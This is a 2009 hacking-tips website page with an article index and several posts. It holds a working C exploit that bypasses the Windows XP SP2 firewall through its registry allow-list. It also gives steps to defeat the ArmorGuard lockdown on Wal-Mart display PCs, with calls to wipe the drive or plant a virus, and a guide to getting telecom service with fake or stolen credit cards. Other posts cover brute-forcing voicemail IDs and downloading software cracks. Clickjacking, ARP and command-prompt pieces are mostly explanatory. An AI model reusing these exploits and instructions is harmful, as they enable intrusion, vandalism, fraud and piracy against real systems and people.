Welcome to Naveen Hacking World - Recently Updated Pages

Naveen Hacking Articles

naveen98859 — Sun, 18 Oct 2009 10:46:28 CDT

A.Naveen Kumar...

Technical Support Engineer & Executive

You can visit this website in your Mobile by typing this link http://naveenhack.mofuse.mobi/

If you want this website link as sms to ur Mobile Click Here

Note: Website name was changed to : ETHICALHACKING.TK for ur convinence

Note: E-mail address was changed to see the e-mail address click here : @ETHICALHACKING.TK
_____________________________________________________
Please Post a comment in this Page THREADS !! Help us to get better!! ..
Don't miss the October Important Updates! FREE to be a member!! (30 seconds)

Latest Update : 18th/October/2009 : New Articles" We do not promote/sponsor Hacking in any form, rather this website will help you gain entry into the minds of

seasoned computer criminals, so that you can forestall their attempts and pre-empt all harmful attacks,
you will be hence weltl equipped to detect the ways in which hackers can infiltrate your system."
We are Spyware & Virus Free

To see all interesting articles click on

Website Updates of October

Bypassing Windows Xp Firewall Updated on 18th October
ARP(Adress resolution Protocol) Attack Updated on 18th October
Calculations on Command Prompt Updated on 18th October
Call any were in the world from pc to mobile for free Updated on 18th October
Chat with your friend from Command Prompt Updated on 18th October
Clickjacking attack Updated on 18th October
Free unlimited Airtel Gprs Updated on 18th October

Website Updates of May

Hacking GTE Telamail Updated on 4th May
Hacking Pc pursuit codes Updated on 4th May
Hacking Walmart Armor guard Updated on 4th May

Website Updates of March

Secret Back doors for many websites Updated on 4th March 2009
How to make fake webpage login Updated on 4th March 2009
How they hack your website Updated on 4th March 2009
Breaking XP&Win 2000 passwords Updated on 4th March 2009
Beginners guide to Hack UNIX Updated on 4th March 2009
Hack unix through brute force Updated on 17th March 2009

Website Updates of February

Hacking Tools Updated on 05th Feb 09

Website updates of January

Fastest way to Hack into System Updated on 22nd Jan 09
Cookie Stealing Updated on 22nd Jan 09
Exploit Sql server System Updated on 22nd Jan 09
Secret Backdoors to many websites Updated on 22nd Jan 09
Netbios Hacking Updated on 22nd Jan 09
Hack Orkut 100% working Updated on 22nd Jan 09
Games CRacks CD keys Updated on 27th Jan 09
Crack Cd Protection Updated on 27th Jan 09
Password-Cracking Techniques Updated on 27th Jan 09

Website updates of December

Log into anyones computer from any where Updated on 8th Dec
Bypass BIOS Boot or OS Login to "most" any computer ... with console access Updated on 13th Dec
Rapidshare Crack Updated on 29th Dec

Website updates of November

Nero 9.0.9 D Updated on 7 th Nov
How Antivirus software works Updated on 13 th Nov
Networking Tips Updated on 13 th Nov
How to make an Auto hacking Usb Drive Updated on 13 th Nov
Hacking Paypal Updated on 28 th Nov

Website updates from 19th to 30th September

How to hide Windows XP account Updated on 19 th Sep
Free Stuff Updated on 22 nd Sep
MP3-GIF: Hide Music Inside A Picture Updated on 23 rd Sep
Hide any file into Photos Updated on 23 rd Sep
Change ur friend Pc password with command Prompt Updated on 24 th Sep
Hacking Toolbar Updated on 30th Sep

Web Site Updates from 25th to 31th August

Antivirus in downloads Updated on 25th Aug
Serials Updated on 30th Aug
MS office 2007 All version Updated on 28th Aug
How to hack Telnet Updated on 28th Aug
E-Books for all needs Updated on 28th Aug will be updated Daily
15 Security Tools Updated on 29th Aug
Finding Wireless Network Updated on 29th Aug
Shut down computer with cell phone Updated on 30th Aug
Nero 8.0 With keyzen Updated on 30th Aug
Download Updated on 30th Aug
Hacking Microsoft outlook express for email adress Updated on 31th Aug

Web Site Updates from 18th to 24th August

Free Operating system Downloads Updated on 18th Aug
How to Change some one passwords in XP Updated on 18th Aug
How to crack and hack windows Updated on 18th Aug
Hacking Videos Updated on 19th Aug
How to customize your Run dialogue box Updated on 22nd Aug
Batch file to crash ur computer Updated on 22nd Aug
How to create Alarm in batch file Updated on 23rd Aug
Dos Commands Updated on 24th Aug
Make fake virus to scare your friends Updated on 24th Aug

Web Site Updates from 9th to 16th of August

How to make fake pages if Yahoo,Orkut,Gmail Updated on 9th Aug...........

Is Mail hacking is Possible? Updated on 9th Aug

How to Create an FTP server in PC Updated on 16th Aug

FBI Forensic Filed Kit Updated on 9th Aug

Hack Pc By USB Updated on 9th Aug

Hacking Online Banking Updated on 9th Aug

Wireless Hacking Tools Updated on 9th Aug

Email Tracking Softwares Updated on 10th Aug

How to Hack Broad Band Updated on 16th Aug

How to Hack the password of every one in a network Updated on 16th Aug

Acessing the Admin Account with out password in XP Updated on 16th Aug

To see more interesting articles click on the Site Map button given below

Legal Disclaimer:-

Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and Wetpaint will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW! Neither administration of this server, the authors of this material, or anyone else affiliated in any way, is going to accept responsibility for your actions. Neither the creator nor Wetpaint is responsible for the comments posted on this website. Any linked sites are not under the control of author or Wetpaint and the author or Wetpaint is not responsible for the contents of any linked site or any link contained in a linked site, or any changes or updates to such sites. We are providing these links to you only as a convenience, and the inclusion of any link does not imply endorsement by us.

This site will Never harm u By giving Out Trojans, Virus or any related stuff. We do not Promote Hacking ! But Lets one be aware of all the Possibilities around. N promotes the way to Curb it to Protect urself. Rest is all Tricks n Tips..~Enjoy

Rights Reserved under Creative Commons License

Click Jacking Attacks

naveen98859 — Sun, 18 Oct 2009 10:10:34 CDT

Definition :-
"Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages." - Wikipedia

Introduction :-
A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The long list of vulnerabilities involves browsers, Web sites and plug-ins like Flash.

How It Works? :-
ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site, Google Gadgets etc.
ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser.
So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

In other words, the attack is thrown by a malicious web page embedding objects, possibly from a different site, such as framed documents or plugin content (Flash, Silverlight, Java…) which may lead to unwanted results if clicked by the current user (e.g. a “Delete all messages” button in your webmail or an advertisement banner in a click fraud scheme). Using DHTML, and especially CSS, the attacker can disguise or hide the click target in several ways which go completely undetected by the user, who’s easily tricked into clicking it in a more or less blind way.

JavaScript increases the effectiveness of these attacks hugely, because it can make our invisible target constantly follow the mouse pointer, intercepting user’s first click with no failure.
We can however imagine a few less effective but still feasible scriptless scenarios, e.g. covering the whole window with hidden duplicates of the target or overlaying an attractive element of the page, likely to be clicked (e.g. a game or a porn image link), with a transparent target instance.

Examples :-
1) Malicious camera spying using Adobe's Flash.
2) Flash, Java, SilverLight, DHTML Game or Application used to Spy on your Webcam and/or Microphone.

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.

NoScript 1.8.9.2
Allow active content to run only from sites you trust,
and protect yourself against XSS and Clickjacking attacks...!

Chat with Friends through ms dos Command Prompt

naveen98859 — Sun, 18 Oct 2009 10:05:15 CDT

1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:

7) Now, type the IP Address of the computer you want to contact and press enter

You will see something like this:

8) Now all you need to do is type your message and press Enter.

Start Chatting.......!

Call Anywhere in the World From PC to Mobile For Free

naveen98859 — Sun, 18 Oct 2009 09:56:11 CDT

Hello Guys Today I will Give you the Full Proofed Hack to Call From PC to Mobile without paying a Penny.
And this is 100% working and tested hack.

THINGS THAT YOU NEED TO MAKE FREE CALLS:

1.A Personal Computer(PC) With Headphones
2.Yahoo Messanger OR SKYPE OR Any Such Calling Software
3.A client Phone Number Whom You want to call.

All the Phone call Hacks provided upto Now are not Working One's . Now I have been Personally using This Hack for more than 15 days. And its Going Well.

HOW TO MAKE FREE CALLS ?

1. Download the latest Yahoo Messanger. OR Skype . http://messenger.yahoo.com/download

2. Install The Yahoo Messanger and Login Into your yahoo Account.

3. Type the Following Number +18003733411 in the Red Box Shown Below and Press Enter.
.

4. After Pressing Enter a small Window will open showing Connecting a Call to that number . Shown Below

5. Now Listen the Call And Wait Untill She Say "Free Calls" .
6. When she Says Free Calls Use Your Microphone and Say Free Calls (Don't forgot to unmute your microphone Voice in Volume Properties By Right Click on Volume Icon in your Task Bar and then click on properties and then Advanced and then unclick mute button under Microphone).
7. As you say Free Calls You will be Able To make 5 minutes free call anywhere in the World.
Now Click on the Dialpad As Shown Below To dial the Number.

8. Now The Dial Pad Opens Like Below

9. Now Dial The Number In format Country code followed by friends number whom you want to call.

Example : 919457196088 where 91 is country code for India and 9457196088 is phone number.

After dialing wait 2 sec for phone call to connect . After that You can call Upto 5 minutes Unlimited.

This Was The Full Tutorial With Snapshot .

For Skype Follow the Same Procedure..

Hello Guys a Great Update to the Above program Has Done.. You can Also Use Skype to make Free Calls . Follow the Same Procedure as for Yahoo Messanger... i.e.

MAKING FREE CALLS THROUGH SKYPE :

Steps:
1. Download the Skype
2. Sign up an account on skype.
3. Now Add +18003733411 to your Contacts.
4. Now Click on call Button On the Above Shown Number.
5. Now Listen the Call Carefully. When He/She says the Freee calls . At that time You also hav to say the Free calls . Now wait Untill she says type your Country Code First.. then u hav to daila the Number and ur Call will be connected .. Dont forget to add country code before it..

That's the Overall Procedure...
Sometimes It may say All Lines are Busy So Don't panic Yaar As Its A Free Service..

If you Guys Having Any Problem Leave Your Comments Below.

Calculations On Command Prompt

naveen98859 — Sun, 18 Oct 2009 09:03:08 CDT

This is not a Hack guys just a trick enjoy.

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.
For more information, type set /? at the command prompt.

Bypassing Windows-XP Firewall

naveen98859 — Sun, 18 Oct 2009 08:59:30 CDT

There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip Vulnerable Systems :-
* Microsoft Windows XP SP2 Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker. If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning. Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :- #include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024]; HKEY hKey;
int i; GetModuleFileName(NULL, filename, 1024); strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg"); RegOpenKeyEx( HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey); RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr; fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n"); sleep(3); if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0; for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in); if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer)); if (!strcmp(buffer, "quit"))
break;
} ezsocket_exit();
return 0;
} /* EoF */

Address Resolution Protocol (ARP) Attacks

naveen98859 — Sun, 18 Oct 2009 08:54:11 CDT

What Does ARP Mean?
Address Resolution Protocol (ARP) is a stateless protocol, was designed to map Internet Protocol addresses (IP) to their associated Media Access Control (MAC) addresses. This being said, by mapping a 32 bit IP address to an associated 48 bit MAC address via attached Ethernet devices, a communication
between local nodes can be made.

On a majority of operating systems, such as Linux, FreeBSD, and other UNIX based operating systems, and even including Windows, the "arp" program is present. This program can be used to display and/or modify ARP cache entries.

An example of the "arp" utility's output would look like the following:

Windows:

> arp -a
Interface: 192.168.1.100 .- 0x10003
Internet Address Physical Address Type
192.168.1.1 00-13-10-23-9a-53 dynamic

Linux:

$ arp -na
? (192.168.1.1) at 00:90:B1:DC:F8:C0 [ether] on eth0

FreeBSD:

$ arp -na
? (192.168.1.1) at 00:00:0c:3e:4d:49 on bge0

How ARP works?

Specifically for Internet Protocol Version 4 (IPv4), ARP maps IP addresses between the Network layer and Data Link layer of the Open System Interconnection (OSI) model.

For a more complete and thorough explanation of how address resolution works, and protocol specifics, please consult RFC 826.

ARP Protocol Flaws :-

ARP's main flaw is in its cache. Knowing that it is possible for ARP to update existing entries as well as add to the cache, this leads one to believe that forged replies can be made, which result in ARP cache poisoning attacks.

Terms & Definitions :-

ARP Cache Poisoning : Broadcasting forged ARP replies on a local network. In a sense, "fooling" nodes on the network. This can be done because ARP lacks authentication features, thus blindly accepting any request and reply that is received or sent.

MAC Address Flooding : An ARP cache poisoning attack that is mainly used in switched environments. By flooding a switch with fake MAC addresses, a switch is overloaded. Because of this, it broadcasts all network traffic to every connected node. This outcome is referred to as "broadcast mode" because, all traffic passing through the switch is broadcasted out like a Hub would do. This then can result in sniffing all network traffic.

The ARP Attacks :-

1] Connection Hijacking & Interception : Packet or connection hijacking and interception is the act in which any connected client can be victimized into getting their connection manipulated in a way that it is possible to take complete control over.

2] Connection Resetting : The name explains itself very well. When we are resetting a client's connection, we are cutting their connection to the system. This can be easily done using specially crafted code to do so. Luckily, we have wonderful software that was made to aid us in doing so.

3] Man In The Middle : One of the more prominent ways of attacking another user in order to hijack their traffic, is by means of a Man In The Middle (MITM) attack. Unlike the other attacks, a MITM is more a packet manipulation attack which in the end however does result in packet redirection to the attacker . all traffic will get sent to the attacker doing the MITM attack. This attack however is specific. As opposed to MAC Address Flooding or other attacks against a router/switch, the MITM attack is against a victim, and also can be done outside of a switched environment. Thus meaning, an attack can be executed against a person on the other side of the country.

4] Packet Sniffing : Sniffing on a Local Area Network (LAN) is quite easy if the network is segmented via a hub, rather than a switch. It is of course possible to sniff on a switched environment by performing a MAC flood attack. As a result of the MAC flood, the switch will act as a hub, and allow the entire network to be sniffed. This gives you a chance to use any sort of sniffing software available to you to use against the network, and gather packets.

5] Denial of Service : MAC Address Flooding can be considered a Denial of service attack. The main idea of the MAC flood, is to generate enough packet data to send toward a switch, attempting to make it panic. This will cause the switch to drop into broadcast mode and broadcast all packet data. This however did not result in a crash, or the service to be dropped, but to be overloaded.

Access Free Airtel GPRS Using TeaShark Browser

naveen98859 — Sun, 18 Oct 2009 08:37:47 CDT

TeaShark, a mobile browser like Opera Mini, allow you to access Airtel GPRS for FREE.

Shockingly it has nothing to do with modifying any Airtel settings or any kind of hack.

Here is how I used this…

* Download TeaShark v. 312. Its free and being JAR file it can be installed on most handsets.

* Open it from your mobile and select AirTel Live as access point.

* That’s it! Open any site from TeaShark and you won’t be charged anything.

Note for the first time, when TeaShark starts, it may take more than one minute to initialize. Also this one time initialization may fail many times. But don’t loose your heart!

As of now, this trick is limited to handsets only.

Note : “Subscribe to Packet Data First”

This means you need to activate AirTel Live service which is free.

Contact customer care to get it activated.

Also select only AirTel Live as access point when prompted by TeaShark.

Download TeaShark :

http://teashark.com/download.html

Rapidshare Crack

naveen98859 — Sun, 18 Oct 2009 07:03:35 CDT

Hi every one are u bored of rapidshare time limit to download the file. From now no need to wait you can download the files with out time limit one after one.

1) Download the crack
2) Paste it to C:\ drive and open the folder
3) Select Rapidshare Crack(globe icon) right click and place a short cut to desktop.
4) Now please delete aall the cookies and clear the browsing history.
5) Now click the rapid share globe Icon a window pops paste the rapidshare link in the window and start download with out time limit. 100% working.

Download Crack Here

Tune Up Utillities 2008 With Crack

delta26 — Tue, 26 May 2009 14:35:37 CDT

TuneUp Utilities makes Windows faster, more secure, and comfortable. All important aspects of system configuration, security, cleaning and maintenance are combined under a modern graphical user interface. Generally in every Crack there will be some viruslike trojan and worm please check and open it

Download : TuneUp Utilities 2008 7.0.7992 (10.09 MB)
Key:-

Hacking The Wal-Mart Armorguard

naveen98859 — Mon, 04 May 2009 03:01:50 CDT

***NOTE***

To use this, you must have a system disk (i.e. a disk that has been formatted using [format a: /s]) in 3.5" format under Windows 95, because that is what they sell all of their computers with.

***NOTE***

In this file, instructions to be input into the computer are surrounded by [ and ]. Keys are surrounded by < and >. So if I say "hit [<CTRL>-<F1>] I mean to hold down the control button and hit F1.

The armorguard is a program that prevents you from writing to the directories, changing the attributes of files, and deleting files. It basically prevents you from doing anything cool.

The first thing to do is to go into Wal-Mart. Now, go to the computer section and turn off the screen saver. Shut down as many apps as you can with the [CTRL ALT DEL] and then choosing a program and hitting enter. You cannot simply do this to the ArmorGuard program.

The next thing to do is to go to the DOS PROMPT. Most Wal-Marts take the mouse ball out of all of the display mice to make it harder to control the system. If you are adept at putting your finger inside the mouse and controlling it that way, fine. Otherwise, just hit [CTRL ALT DEL]. This activates the start menu. Select "Programs", hit enter, then go down to near the bottom of the "Programs" menu and select "MS-DOS PROMPT". Hit enter.

Now you are in a DOS window and in the C:\Windows directory. Hit [cd..] and then hit [fdisk /mbr], which restores the master boot record, preventing the password prompt from coming up when you reset the computer
.
Now just hit [CTRL ALT DEL] twice (once gets you to task manager, twice reboots) and wait. When you see

Starting Windows 95...

on the screen, hit [<F8>] really fast just once, then choose "Verify each step" (or something to that effect), usually choice number 4. It will give you an A: prompt and say "Please give the path of your command interpreter, i.e. C:\WINDOWS\COMMAND.COM". At this point, put the system disk you have made in the drive and hit [A:\COMMAND.COM]. Say "Yes" to everything except the following:

Log this bootup? (Bootlog.txt)? (y/n)

C:\armguard.exe? (y/n)
(***OR ANYTHING ELSE STARTING WITH "C:\ARM", LIKE "C:\ARMOR", for instance.)
If you have done this right, ARMGUARD SHOULDN'T COME UP AT ALL. If it does, hit "command prompt only" instead of "Verify each step" and then specify C:\AUTOEXEC.BAT and C:\CONFIG.SYS if it asks for the configuration and the startup file. (IN THE OPPOSITE ORDER. CONFIG.SYS IS THE CONFIG FILE, AUTOEXEC.BAT IS THE STARTUP FILE.) Then immediately hit [<F4>] and it will give you step-by-step confirmation for each item. See above for the ones to say no to. Then you want to hit

[C:\WINDOWS\COMMAND\EDIT.COM C:\WINDOWS\WIN.INI]

and the DOS edit program will come up. Choose "Search" and hit "Find" and then tell it to find ARM and make sure it's NOT on match whole word only. Delete any line with ARM in it that looks like a part of ArmorGuard. This should prevent it from coming up on Windows.
*******IF NONE OF THIS WORKS, YOU HAVE TO TAKE THE READ-ONLY AND ARCHIVE ATTRIBUTES OFF OF THE WIN.INI, SYSTEM.INI, AUTOEXEC.BAT, AND CONFIG.SYS FILES BY HITTING [ATTRIB -A -R (c:\WHATEVERFILE.YOUWANTTODOTHISTO)]

*******I'D ALSO RECOMMEND EDITING THE AUTOEXEC.BAT FILE TO PREVENT ARMGUARD FROM EVER COMING UP AGAIN.

****************THINGS TO DO AFTER HACKING ARMORGUARD***********

Hmmm.... USE YOUR IMAGINATION!

Think of this: Hit "shut down in MS-DOS mode" or start up in MS-DOS mode, put your boot disk in drive a: and hit the following commands

[A:] [FORMAT C:]

and then confirm this. You have just started the permanent erasing of EVERYTHING on the hard drive. You can also do some other cool stuff with it too, just basically IF YOU WOULD DO IT TO SOMEONE YOU HATE, DO IT TO WAL-MART. Personally, I'd think that INSTEAD OF ERASING THE HARD DRIVE, I'D WRITE A VIRUS AND PUT IT ON THE COMPUTER. THAT WOULD REALLY BE MORE FUN. JUST STORE IT ON A FLOPPY AND COPY IT.

Hacking Pc Pursuit Codes

naveen98859 — Mon, 04 May 2009 02:52:21 CDT

OK, people... This is going to be all you need to know about PC-Pursuit and how to use it to the fullest extent without paying for it.
First let's look at what we need to know:

Functions of PC-Pursuit
How you can get your own PC-Pursuit account
How to use PC-Pursuit
City Codes for PC-Pursuit

Let's look at them one at a time, shall we?

*)> 1 - Functions of PC-Pursuit <(*

Basically, PC-Pursuit is a subsidiary of Telenet, which is a subsidiary of U.S. Sprint (ugh!). What PC-Pursuit is is a chain of modems that a registered user can access to make long-distance calls for only $25 a month.

Sounds great, doesn't it? Of course, but there ARE some catches, of course. Namely that you have do ONLY calls via modem, no voice. And that all calls must be made between 6pm (local time) and 7 am, lest you get some hefty surcharges.

BUT, my friends, there is a way that you can use PC-Pursuit for less that the flat $25 a month... Namely for FREE... Which brings us to number 2...

*)> 2 - How you can get your own PC-Pursuit account <(*

Now, there are two ways to get around the fees. The easy way (laden with risks), and the hard way (fewer risks)
Let's look at them one at a time.

The EASY way to hack an account on PC-Pursuit isn't even hacking, really... When you call the PC-Pursuit main bulletin board (more on that later), you can sign up for PC-Pursuit. BUT you need a major credit card...

Again, we have two choices for this. We can either enter a bullshit credit card number with the proper format and a phoney name, or a valid credit card number that isn't your own... Either way, you have to give them YOUR address, unless you have a P.O. Box or a mailbox at a private company or another location.

They will send you a packet an a week to 10 days, and then you can just go fucking nuts calling all the PC-Pursuitable cities (25 at last count).
That is the easy way... I told you it was risky...

The HARD way is to actually hack out someone's code on a Telenet system (a complete national listing of all local Telenet access numbers is available on this board).

When you log on to Telenet, you see NOTHING.. Press ENTER twice. Simple, eh? Next you see the first prompt from Telenet, 'TERMINAL='
Next you get the main Telenet prompt, the '@' symbol.

From here, a PC-Pursuit user would type this:

C D/SSCCC/BB,PCP12345,ABCD1234

C is for Connect. With This command, you can also log on to many of the major computer services such as Delphi, QuantumLink, and CompuServe.
The D is for Dial. Simple The slash divides commands and parameters on Telenet The SSCCC is SS= a two-letter state code and CCC= a three letter city code (more on these later)

The BB is either 3, 12 or 24, depending on the baud rates available for the particular PC-Pursuit accessible area code, and the baud rate you want (24, in most cases)

Now the good stuff... The access codes and password.

The Access codes are ALWAYS in the format of PCPxxxxx. Always.

The PASSWORDS are varied. They are initially registered to the user in the format of XXXXyyyy where XXXX are four letters and yyyy are four digits... NOW, your saving grace from people changing their passwords is that Telenet charges $5.00 for each password change... So this helps...

Other commands available on Telenet are D (when not preceded by a C) for Disconnect and HANGUP, which does just that.
Now that you have gotten your very own PC-Pursuit account, you need to know how to use the damn thing.

*)> 3 - How to use PC-Pursuit <(*

Sure, you can issue the command from Telenet to dial the city and baud that you want, but after it gives you the CONNECTED message, you are as lost as a blind lesbian in a fish market.

No problem... From here on in, it's all peaches and cream. The modems use the Hayes AT command set...
To dial your number all you do is type in this:

ATDTxxxxxxx CR

xxxxxxx = the phone number of the board you want to call.

Easy, eh? And your other major AT commands are available:

ATZ Zaps the modem back to default settings

ATH Hangs up the modem

A/ Repeats the last command given

ATDP Dials pulse (WHY?!?)

And so on.

When you want to connect to another city, Type '@' from the modem command mode, and then 'D <CR>' at the Telenet main prompt. Easy as pie.
So, now you are all set and take advantage of the generous service that another stupid multi-billion dollar corporation has bestowed upon us, the hackers of America.

Telenet also has a couple of nifty goodies that are available to the users of PC-Pursuit, and the general public. These are both modem lines.

PC-Pursuit Registration & Information 1-800-835-3638 or 703-689-5700 On this BBS you can actually register for PC-Pursuit, and find out a little about the system. It has no features, and is pretty boring. It might be fun to crash, though.

PC-Pursuit Net Exchange BBS

At the Telenet '@' prompt, type: PC PURSUIT,YOURID,PASSWORD or call 703-689-3561. This BBS has new info for PC-Pursuit users (be they legal or not). It is advisable to keep a low profile on there, as they have had a few hackers just go nuts and bring themselves in the spotlight. Which is good, because the heat is on them, not the smart ones that keep a low profile and are quit.

If for some reason there is a problem with your billing (hee hee hee) the Telenet network has their Customer Service & Billing numbers:
1-800-336-0437 or 703-689-6400

PC-Pursuit

Hacking GTE Telemail

naveen98859 — Mon, 04 May 2009 02:41:44 CDT

WHAT IS TELEMAIL?

For many years, rich corporate mongers have invested in personal telemail boxes for their employees. The generic term for this type of messaging system is a "voice mailbox". It's nothing more than an answering machine with a few extra frills. The good thing about voice mailbox hacking, is that there are 1-800 access numbers, which makes it easy for anyone who doesn't feel like phreaking to your number, to leave you a message.

OPERATING GTE TELEMAIL

To play with any voice mailbox, it is usually necessary to have a touch tone fone. This incorporates the standard 0-9 digits and the two function keys. The symbol that looks like a tic-tac-toe sign, "#", is called the pound key. The other is an asterisk, and is called that, or the "star". You will need to be farmiliar with those to use this system.

GTE Telemail, as like other voice mailoxes are VOICE. IE: You don't use your modem for hacking this, it's all manual (pain in the butt, yes, I know). If you like, you can try all this out while you are reading the file, just so that you get used to the service.

The phone number for this service is: 1-800-348-6551. When you first dial the number, and it answers, you'll hear this: "<Beep><Beep><Beep><Booo> Hello. You've reached the telemessages service. The person you are calling is presently unavailable. To leave a message, enter the address of the person you are calling; or to access your regular message box, enter the pound sign".

Most of the hacking that you are going to be doing is on the "regular message box". This is where the people get the messages that people have sent to them. You would dial the pound key after that announcement. To make your life easier, you never have to wait for those recordings to finish. You can interrupt the lady only after she has begun speaking, but you can dial the pound key right after the beeps. After pressing the pound key, you will hear another recording: "Please enter your id number". It is here that you would enter someone's id number. You will then hear a short "beep". Another recording will come on if it is a valid number: "You have XX new messages, and XX saved messages". New messages are ones that you haven't heard yet, saved messages are the ones that you wanted to keep for later reading, or rereading.

There are different types of boxes on this service. Some have "Greeting Messages" and "Bulletins", some have a strange method of picking up messages. I will go over those now:

If you have messages waiting, you can receive them by dialing "2". Sometimes, it won't give you that option, so you will have to dial "011" for your new messages, or "012" for your saved messages. When you are listening to your messages, you may dial a "2" to pause, and another "2" to continue. A "3" will rewind the messages a couple of seconds back, and a "4" will fast forward the message. Usually, if you hit the "4" key twice in a row quickly, it will jump to the end of the message and beep, giving you a second menu. After you have heard the message, you are given these options:

022: Reply back to the person

021: Redirect the message

7: Save the message

5: Delete the message

Dialing the asterisk at any point is like an abort command. It usually will stop what you are doing and go to the last menu before what you are currently doing. If you dial the asterisk at the top menu, "To get your new messages, dial 011...etc", you will get a recording that says, "GoodBye", and then be hung up.

HACKING GTE TELEMAIL

....is a pain, but it works.

The object when hacking these things is find out as many 6 digit personal id codes as possible. You see, to send someone a message, that involves a 7 digit code. Since the 6 digit code is easier to get, and gives you more information, you have to scan through an entire prefix of numbers to get as many id codes as possible.

All you really need is a touch tone fone, and a notebook. It's handy if your fone has some kind of memory, and you can recall any number at a single touch. Like my fone here, there are 12 extra buttons that you can program numbers into.

First, you have find out a prefix for Texas. You know, a prefix, the first three numbers in a seven digit fone number, not counting the area code. There's lots of ways to do this. You can either whip out your fone book, or dial "1-214-555-1212" or "1-817-555-1212". Most of the time, you can phreak to those two numbers from any service. I know that Sprint lets you.

Tear out a separate piece of paper from the notebook, and draw up a chart that looks similar to this:

0 0 1 2 3 4 5 6 7 8 9
1 0 1 2 3 4 5 6 7 8 9
2 0 1 2 3 4 5 6 7 8 9
3 0 1 2 3 4 5 6 7 8 9
4 0 1 2 3 4 5 6 7 8 9
5 0 1 2 3 4 5 6 7 8 9
6 0 1 2 3 4 5 6 7 8 9
7 0 1 2 3 4 5 6 7 8 9
8 0 1 2 3 4 5 6 7 8 9
9 0 1 2 3 4 5 6 7 8 9

The chart stands for numbers from 00-99. The first row, represents "00-09", the second row would be "10-19" (understand?). To read it, the number on the farthest left is the first digit in the number, then you just go from "0-9" on the rest of the row for the second digit. It's easier than writing out "00-99" in order.
Now, take the 3 digit prefix in Texas, and add a "0" after it. In other words, if the prefix you picked was "123" (No, that's not a real working prefix), then you'd have "1230". If you are using the programmable fone that I mentioned before, put this four digit number into a key, or somewhere on the fone that you can retrieve it easily.

Dial up the number (1-800-348-6551), and wait for the "<beep><beep><beep><boo>", as soon as you hear the last <Boo> sound, hit the pound key. As soon as the lady begins to speak, hit the key that has those four numbers programmed into it, or manually dial those four numbers. After that, dial the two digit number that you get from the chart. This should make 6 digits in all. If it's an invalid code, you will get this recording: "We're sorry, we are unable to process the id you entered, please try again." As soon as you hear the lady start to say "We're sorry", hit the asterisk button. You'll hear two quick beeps. Cross out the number on the chart that didn't work. For example: You just began the dialing, you picked "123" for a prefix, and added the "0" on to get "1230". You were starting from the first line of your chart, which looks like this:

0 0 1 2 3 4 5 6 7 8 9

